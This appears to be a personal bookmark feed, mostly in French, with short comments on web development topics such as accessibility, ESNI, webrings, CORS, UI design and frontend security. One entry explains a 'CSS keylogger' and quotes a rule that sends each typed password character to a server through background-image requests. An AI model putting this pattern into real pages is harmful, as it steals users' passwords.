Good practises to create accessible content

(via https://nicolas-delsaux.hd.free.fr/Shaarli/?ffl0MQ)

Using the object EventSource from the client side in javascript ! So it allows to stream updates from a server.

TL;DR Le SNI (Server Name Indication) est utilisé pour que le serveur envoie le bon certificat TLS. Le ESNI est la version chiffrée du SNI et se passe avant le handshake. La clé publique du serveur est stockée dans un enregistrement DNS, qui est envoyée en même temps que l'adresse IP.

Normaliser un moyen d'effectuer des paiements avec l'URI payto serais efficace pour faciliter les transactions sur Internet, via bitcoin, IBAN, etc...
Pourquoi pas ? Il faudra néanmoins comme d'habitude que tout le monde adopte ce standard, ce qui peut prendre du temps.

Un billet de blog qui me marque beaucoup ! ❤️

Il est vrai que trouver des pépites sur le web depuis un moteur de recherche est devenu impensable, tant les sites imposants sont présents.

Merci pour la collection d'annuaires ! Et de moteurs de recherches différents du Google, DuckDuckGo, Ecosia, Bing, etc... Il y en des originaux, avec par exemple

Je connaissais déjà les webrings, et je trouves l'idée géniale ! Chaque site référence un ou deux autres sites, qui eux-même en référence un ou deux, etc... Sur un webring à un sens (un site en référence un autre uniquement), . Sur un webring à deux sens, on peut "avancer" ou "reculer" sur la boucle, comme si on allais en avant ou en arrière, pour au final retomber sur le même site si on va toujours dans le même sens.

Les agrégateurs deviennent connus puisqu'ils sont plus pratiques qu'un moteur de recherche pour diffuser rapidemment des informations. Il y a notamment Hacker News ou le Journal du hacker est l'agrégateur de référence pour la communauté francophone.

Il y a une citation de Laura Kalbag ! Que le monde est petit 😄

Mhmhmhmh 🤔
Rails + PostgreSQL + Plain CSS + Heroku is the best for him after this experience.

Sort the components into :

1. Atoms
2. Molecules
3. Organisms
4. Templates
5. Pages

Malin ! Un keylogger en CSS !

En fait un script génère pour tous les caractères ASCII, l'instruction CSS suivante :

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

Qui signifie que pour les champs de type password dont la valeur se termine par a, on va effectuer une requête externe vers un serveur avec la lettre a. On fait ça pour tous les caractères et hop on a le mot de passe.

(via https://links.hoa.ro/shaare/689gzA, via https://bookmarks.ecyseo.net/?cymp8g)

OMG ! 😍
It looks legit to me. I have to give it a try.

CORS est devenu incontournable pour le développement web (front et back) ! Cette documentation explique sont fonctionnement.

Comme d'habitude, la documentation de MDN est de qualité.

1. Use color and weight to create hierarchy instead of size
2. Don’t use grey text on colored backgrounds
   1. Reduce the opacity of white text
   2. Hand-pick a color that’s based on the background color
3. Offset your shadows
4. Use fewer borders
   1. Use a box shadow
   2. Use two different background colors
   3. Add extra spacing
5. Don’t blow up icons that are meant to be small
6. Use accent borders to add color to a bland design
7. Not every button needs a background color

Using the web workers for long calculation et preserve the main thread for the display, to keep a reactive user interface (such as classical UI actually)

(via https://nicolas-delsaux.hd.free.fr/Shaarli/?f7VSzg)

• Ne jamais faire confiance aux applications frontend
• N'utilisez pas votre propre cryptographie
• N'utilisez pas de clé de chiffrement prédictibles
• Ne réutilisez pas une clé de chiffrement
• Obfusquer n'est pas sécuriser
• Sécurisez plutôt votre backend

Et de bon conseils pratiques comme éviter d'utiliser des promesses pour traiter les requêtes du client, mais plutôt des callbacks

(via Riduidel)